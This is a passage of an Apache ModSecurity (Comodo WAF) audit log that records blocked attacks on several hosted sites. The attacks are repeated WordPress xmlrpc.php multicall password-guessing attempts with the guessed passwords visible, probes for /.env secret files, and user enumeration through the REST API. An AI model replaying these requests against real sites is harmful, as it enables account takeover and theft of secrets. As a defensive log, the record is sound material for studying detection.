(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748428362309210 2853 (- - -) Stopwatch2: 1748428362309210 2853; combined=1392, p1=456, p2=904, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70a59c0d-Z-- --4d39a439-A-- [28/May/2025:17:48:53 +0700] aDbqFQ3r-0gDryHAyD_V3AAAAEM 103.236.140.4 40022 103.236.140.4 8181 --4d39a439-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4d39a439-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix.2020 --4d39a439-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d39a439-E-- --4d39a439-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748429333954433 6289 (- - -) Stopwatch2: 1748429333954433 6289; combined=4430, p1=515, p2=3737, p3=0, p4=0, p5=107, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d39a439-Z-- --18ad9242-A-- [28/May/2025:18:04:15 +0700] aDbtrw3r-0gDryHAyD_WPwAAAEM 103.236.140.4 41562 103.236.140.4 8181 --18ad9242-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --18ad9242-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix-2022 --18ad9242-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18ad9242-E-- --18ad9242-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748430255117303 6449 (- - -) Stopwatch2: 1748430255117303 6449; combined=4500, p1=527, p2=3805, p3=0, p4=0, p5=100, sr=95, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18ad9242-Z-- --c39c054d-A-- [28/May/2025:18:05:52 +0700] aDbuEBwBHP_x2VCWa06R6AAAANY 103.236.140.4 41630 103.236.140.4 8181 --c39c054d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c39c054d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix102030 --c39c054d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c39c054d-E-- --c39c054d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748430352633997 6178 (- - -) Stopwatch2: 1748430352633997 6178; combined=4054, p1=497, p2=3434, p3=0, p4=0, p5=73, sr=84, sw=50, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c39c054d-Z-- --dddc2d00-A-- [28/May/2025:18:10:35 +0700] aDbvKw3r-0gDryHAyD_WXQAAAFU 103.236.140.4 42098 103.236.140.4 8181 --dddc2d00-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --dddc2d00-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel2007 --dddc2d00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dddc2d00-E-- --dddc2d00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748430635033859 3520 (- - -) Stopwatch2: 1748430635033859 3520; combined=2736, p1=315, p2=2288, p3=0, p4=0, p5=78, sr=49, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dddc2d00-Z-- --c6fab33a-A-- [28/May/2025:18:20:29 +0700] aDbxfQ3r-0gDryHAyD_aEwAAAFg 103.236.140.4 59112 103.236.140.4 8181 --c6fab33a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c6fab33a-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel90 --c6fab33a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6fab33a-E-- --c6fab33a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748431229707454 5202 (- - -) Stopwatch2: 1748431229707454 5202; combined=3888, p1=432, p2=3285, p3=0, p4=0, p5=100, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6fab33a-Z-- --7c933b10-A-- [28/May/2025:18:21:39 +0700] aDbxw-szXCullgn3bbG-HgAAABE 103.236.140.4 34372 103.236.140.4 8181 --7c933b10-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7c933b10-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelazerty --7c933b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c933b10-E-- --7c933b10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748431299804760 5761 (- - -) Stopwatch2: 1748431299804760 5761; combined=4404, p1=502, p2=3714, p3=0, p4=0, p5=111, sr=86, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c933b10-Z-- --dc680f31-A-- [28/May/2025:18:27:54 +0700] aDbzOvnnEwDNUSjDseIsQgAAAII 103.236.140.4 38774 103.236.140.4 8181 --dc680f31-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 165.22.34.189 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 165.22.34.189 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --dc680f31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc680f31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748431674315562 1248 (- - -) Stopwatch2: 1748431674315562 1248; combined=394, p1=341, p2=0, p3=0, p4=0, p5=53, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc680f31-Z-- --cdd92b53-A-- [28/May/2025:18:28:47 +0700] aDbzbw3r-0gDryHAyD_b_AAAAFI 103.236.140.4 38898 103.236.140.4 8181 --cdd92b53-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cdd92b53-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel!@#$antix1234 --cdd92b53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdd92b53-E-- --cdd92b53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748431727855484 5376 (- - -) Stopwatch2: 1748431727855484 5376; combined=3918, p1=420, p2=3272, p3=0, p4=0, p5=136, sr=78, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdd92b53-Z-- --6ca32233-A-- [28/May/2025:18:30:08 +0700] aDbzwA3r-0gDryHAyD_cEAAAAE8 103.236.140.4 39042 103.236.140.4 8181 --6ca32233-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 128.199.182.152 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 128.199.182.152 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6ca32233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ca32233-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748431808012095 835 (- - -) Stopwatch2: 1748431808012095 835; combined=321, p1=290, p2=0, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ca32233-Z-- --143f5335-A-- [28/May/2025:18:36:41 +0700] aDb1SQ3r-0gDryHAyD_ckAAAAEk 103.236.140.4 39556 103.236.140.4 8181 --143f5335-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.211.5.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.211.5.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --143f5335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --143f5335-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748432201028705 3165 (- - -) Stopwatch2: 1748432201028705 3165; combined=1310, p1=437, p2=836, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --143f5335-Z-- --79581966-A-- [28/May/2025:18:41:51 +0700] aDb2f-szXCullgn3bbG_hwAAABY 103.236.140.4 40044 103.236.140.4 8181 --79581966-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.217.205.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.217.205.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --79581966-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79581966-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748432511856350 2969 (- - -) Stopwatch2: 1748432511856350 2969; combined=1281, p1=438, p2=811, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79581966-Z-- --5dfdbf1e-A-- [28/May/2025:18:43:39 +0700] aDb26_nnEwDNUSjDseIssgAAAJI 103.236.140.4 40212 103.236.140.4 8181 --5dfdbf1e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.230 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.230 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5dfdbf1e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel& --5dfdbf1e-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dfdbf1e-E-- --5dfdbf1e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748432619670049 5541 (- - -) Stopwatch2: 1748432619670049 5541; combined=4069, p1=394, p2=3469, p3=21, p4=25, p5=96, sr=93, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dfdbf1e-Z-- --e7b51d43-A-- [28/May/2025:18:44:43 +0700] aDb3K_nnEwDNUSjDseIswQAAAJM 103.236.140.4 40292 103.236.140.4 8181 --e7b51d43-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e7b51d43-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelFaadhel5 --e7b51d43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7b51d43-E-- --e7b51d43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748432683883708 4684 (- - -) Stopwatch2: 1748432683883708 4684; combined=3576, p1=386, p2=3030, p3=0, p4=0, p5=93, sr=78, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7b51d43-Z-- --8ad9ea74-A-- [28/May/2025:18:50:37 +0700] aDb4jfnnEwDNUSjDseItAQAAAIM 103.236.140.4 40828 103.236.140.4 8181 --8ad9ea74-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8ad9ea74-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilantix1234 --8ad9ea74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ad9ea74-E-- --8ad9ea74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748433037058975 6237 (- - -) Stopwatch2: 1748433037058975 6237; combined=4271, p1=506, p2=3588, p3=0, p4=0, p5=108, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad9ea74-Z-- --851caf4f-A-- [28/May/2025:18:51:23 +0700] aDb4uxwBHP_x2VCWa06Z4wAAAM8 103.236.140.4 40870 103.236.140.4 8181 --851caf4f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --851caf4f-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil@23 --851caf4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --851caf4f-E-- --851caf4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748433083046610 4605 (- - -) Stopwatch2: 1748433083046610 4605; combined=3613, p1=378, p2=3067, p3=0, p4=0, p5=98, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --851caf4f-Z-- --dd71db13-A-- [28/May/2025:18:52:04 +0700] aDb45PnnEwDNUSjDseItDAAAAIQ 103.236.140.4 40920 103.236.140.4 8181 --dd71db13-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --dd71db13-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil** --dd71db13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd71db13-E-- --dd71db13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748433124057355 6141 (- - -) Stopwatch2: 1748433124057355 6141; combined=4338, p1=494, p2=3668, p3=0, p4=0, p5=104, sr=90, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd71db13-Z-- --2ee4d81e-A-- [28/May/2025:19:15:50 +0700] aDb-dg3r-0gDryHAyD_eIgAAAFQ 103.236.140.4 43134 103.236.140.4 8181 --2ee4d81e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 